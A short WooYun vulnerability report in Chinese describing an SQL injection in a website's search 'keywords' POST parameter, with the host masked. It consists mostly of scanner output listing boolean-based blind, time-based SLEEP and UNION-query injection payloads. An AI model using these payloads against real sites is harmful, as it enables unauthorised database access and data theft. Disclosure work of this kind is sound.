WooYun.org

1.网站：**.**.**.**/
2.对用户数据过滤不严导致的注入点：
不知道为啥传不了图，文字描述吧，很简单，就是网站主页的所搜功能，对应的Post请求为
http://**.**.**.**/searchresult
keywords=123
3.扫到的注入方式：
---
Parameter: keywords (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keywords=123%' AND 6866=6866 AND '%'='
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: keywords=123%' AND (SELECT * FROM (SELECT(SLEEP(5)))ioDo) AND '%'='
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: keywords=123%' UNION ALL SELECT NULL,CONCAT(0x716a627671,0x567969616b5a546f6576,0x717a7a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---